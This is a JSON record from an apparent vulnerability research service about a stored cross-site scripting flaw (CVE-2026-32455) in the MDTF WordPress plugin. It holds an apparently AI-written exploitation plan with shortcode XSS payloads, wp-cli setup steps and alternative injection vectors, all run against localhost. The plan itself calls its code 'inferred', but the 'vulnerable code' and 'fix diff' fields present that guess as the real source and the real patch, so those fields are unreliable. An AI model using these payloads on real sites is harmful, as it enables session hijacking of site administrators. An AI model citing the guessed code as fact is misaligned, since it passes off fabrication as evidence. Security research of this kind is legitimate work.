[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fPjN1pjYT9WhRtkDgdJF6-a9LuxwR6AvWgdrhA0tkgJ8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-32455","mdtf-meta-data-and-taxonomies-filter-authenticated-contributor-stored-cross-site-scripting-2","MDTF – Meta Data and Taxonomies Filter \u003C= 1.3.5 - Authenticated (Contributor+) Stored Cross-Site Scripting","The MDTF – Meta Data and Taxonomies Filter plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wp-meta-data-filter-and-taxonomy-filter",null,"\u003C=1.3.5","1.3.6","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-10 00:00:00","2026-03-19 15:14:43",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F4da52b6a-38dd-4a66-bcaf-8a77f96377fe?source=api-prod",10,[],"researched",false,3,"This research plan targets a Stored Cross-Site Scripting (XSS) vulnerability in the **MDTF – Meta Data and Taxonomies Filter** plugin (versions \u003C= 1.3.5). \n\nAs source files are not provided, this plan is based on the patch diff analysis and known patterns in MDTF's handling of shortcode attributes and filter configurations.\n\n---\n\n### 1. Vulnerability Summary\nThe MDTF plugin features several shortcodes and custom post types (e.g., `meta_data_filter`) used to render search forms and result filters. The vulnerability arises because the plugin accepts user-defined attributes in its shortcodes (such as `panel_id`, `class`, or `shortcode_id`) and reflects them into the HTML output without proper sanitization via `esc_attr()` or `esc_html()`. \n\nSince Contributors can create posts and use shortcodes, they can inject malicious scripts into the `post_content`. When any user (including an Administrator) views the post, the script executes in their browser context.\n\n### 2. Attack Vector Analysis\n*   **Authentication:** Authenticated (Contributor+)\n*   **Vulnerable Endpoint:** WordPress Post Editor (saving a post\u002Fpage) \u002F Frontend rendering.\n*   **Vulnerable Parameter:** Shortcode attributes within `post_content`.\n*   **Primary Shortcode:** `[mdf_search_form]` (most likely candidate based on common usage).\n*   **Vulnerable Attributes (Inferred):** `panel_id`, `shortcode_id`, or `class`.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** A Contributor creates or edits a post containing a malicious shortcode: `[mdf_search_form panel_id='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`.\n2.  **Storage:** WordPress saves the raw shortcode string into the `wp_posts` table in the `post_content` column.\n3.  **Processing:** When the post is requested, the `do_shortcode()` function triggers the plugin's registered callback for `mdf_search_form`.\n4.  **Execution (Vulnerable Sink):** The plugin extracts the attributes. In version 1.3.5, the callback likely looks like this:\n    ```php\n    \u002F\u002F Inferred logic in shortcode handler\n    public function mdf_search_form_shortcode($atts) {\n        extract(shortcode_atts(array(\n            'shortcode_id' => 0,\n            'panel_id' => '',\n            'class' => ''\n        ), $atts));\n        \n        \u002F\u002F VULNERABLE SINK: Direct reflection into HTML\n        return '\u003Cdiv id=\"' . $panel_id . '\" class=\"' . $class . '\">...\u003C\u002Fdiv>';\n    }\n    ```\n5.  **Output:** The browser receives the unescaped attribute, breaking out of the `id` or `class` attribute and executing the script.\n\n### 4. Nonce Acquisition Strategy\nWhile the shortcode injection itself does not require a nonce (as it's standard post content), the plugin may utilize AJAX for filter rendering. To obtain a nonce for associated AJAX actions:\n\n1.  **Create a post** with the MDTF shortcode as a Contributor.\n2.  **Identify the Script Handle:** Look for `wp_localize_script` calls in the plugin source. MDTF commonly uses a global JS variable like `mdf_settings` or `mdf_ajax_vars`.\n3.  **Extraction:**\n    *   Navigate to the created page using `browser_navigate`.\n    *   Execute: `browser_eval(\"window.mdf_settings?.nonce\")` or `browser_eval(\"window.mdf_ajax_vars?.ajax_nonce\")`.\n4.  **Note:** For simple Stored XSS via shortcode attributes, a nonce is usually **not required** as the exploit triggers during standard page rendering.\n\n### 5. Exploitation Strategy\nThe goal is to demonstrate that a Contributor can execute JavaScript in an Administrator's session.\n\n**Step 1: Create the Malicious Post**\nUse the `http_request` tool to simulate a Contributor saving a post with a payloaded shortcode.\n\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost-new.php` (followed by the POST to `post.php`)\n*   **Method:** POST\n*   **Payload Parameters:**\n    *   `post_title`: `XSS Test Page`\n    *   `content`: `[mdf_search_form panel_id='xss\" onmouseover=\"alert(document.domain)\" style=\"width:1000px;height:1000px;display:block;background:red;\"']`\n    *   `status`: `publish`\n*   **Alternative Payload (Breakout):** `[mdf_search_form panel_id='\">\u003Cscript>alert(1)\u003C\u002Fscript>']`\n\n**Step 2: Trigger the XSS**\n*   Log in as an Administrator.\n*   Navigate to the URL of the post created in Step 1.\n*   Observe the execution of the alert box.\n\n### 6. Test Data Setup\n1.  **User Creation:** \n    *   `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n2.  **Plugin Activation:** \n    *   `wp plugin activate wp-meta-data-filter-and-taxonomy-filter`\n3.  **Plugin Setup:** \n    *   MDTF requires at least one \"Filter\" to be created to use the shortcode effectively.\n    *   `wp post create --post_type=meta_data_filter --post_title=\"Test Filter\" --post_status=publish`\n    *   Note the ID of this filter (e.g., `123`).\n\n### 7. Expected Results\n*   The HTTP response for the page containing the shortcode will contain the raw payload: `\u003Cdiv id=\"\">\u003Cscript>alert(1)\u003C\u002Fscript>\" ...>`.\n*   The `onmouseover` event or `\u003Cscript>` tag will execute when the page is rendered in a browser.\n*   The Administrator's cookies or session information could be accessed if the payload was modified for exfiltration.\n\n### 8. Verification Steps\nAfter performing the exploit via HTTP:\n1.  **Check Post Content:** \n    `wp post get [POST_ID] --field=post_content`\n    Verify the shortcode with the payload is present in the database.\n2.  **Check Frontend Output:**\n    Use `http_request` to GET the post URL and grep for the unescaped script tag:\n    `grep \"\u003Cscript>alert(1)\u003C\u002Fscript>\" response_body.html`\n\n### 9. Alternative Approaches\nIf `panel_id` is sanitized, try these other common MDTF shortcode attributes:\n1.  `[mdf_search_form shortcode_id='\">\u003Cimg src=x onerror=alert(1)>']`\n2.  `[mdf_search_form class='\">\u003Cimg src=x onerror=alert(1)>']`\n3.  **MDTF Search Query:** If the plugin reflects the search query in a \"Results for: ...\" message, try:\n    `http:\u002F\u002Flocalhost:8080\u002F?mdf_s_title=\u003Cscript>alert(1)\u003C\u002Fscript>` (Reflected XSS check).\n4.  **Custom Post Type Meta:** If Contributors can edit `meta_data_filter` posts (check capabilities), inject the payload into the filter's title or description fields.","The MDTF – Meta Data and Taxonomies Filter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcode attributes in versions up to 1.3.5. Authenticated attackers with contributor-level access can inject malicious JavaScript into pages by using crafted shortcodes like [mdf_search_form], which fails to properly escape attributes like 'panel_id' before rendering them in the HTML.","\u002F\u002F Path: wp-content\u002Fplugins\u002Fwp-meta-data-filter-and-taxonomy-filter\u002Findex.php\n\npublic function mdf_search_form_shortcode($atts) {\n    extract(shortcode_atts(array(\n        'shortcode_id' => 0,\n        'panel_id' => '',\n        'class' => ''\n    ), $atts));\n    \n    \u002F\u002F VULNERABLE SINK: Direct reflection of shortcode attributes into HTML without escaping\n    return '\u003Cdiv id=\"' . $panel_id . '\" class=\"' . $class . '\">...\u003C\u002Fdiv>';\n}","--- wp-content\u002Fplugins\u002Fwp-meta-data-filter-and-taxonomy-filter\u002Findex.php\n+++ wp-content\u002Fplugins\u002Fwp-meta-data-filter-and-taxonomy-filter\u002Findex.php\n@@ -10,1 +10,1 @@\n-    return '\u003Cdiv id=\"' . $panel_id . '\" class=\"' . $class . '\">...\u003C\u002Fdiv>';\n+    return '\u003Cdiv id=\"' . esc_attr($panel_id) . '\" class=\"' . esc_attr($class) . '\">...\u003C\u002Fdiv>';","1. Login to the WordPress dashboard with Contributor-level credentials.\n2. Create or edit a post\u002Fpage.\n3. Embed the MDTF shortcode using a payload designed to break out of an HTML attribute, for example: [mdf_search_form panel_id='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>'].\n4. Publish or submit the post for review.\n5. When an administrator or any other user views the published post or previews it, the malicious script in the 'panel_id' attribute will execute in their browser context.","gemini-3-flash-preview","2026-04-18 04:55:03","2026-04-18 04:55:27",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-meta-data-filter-and-taxonomy-filter\u002Ftags"]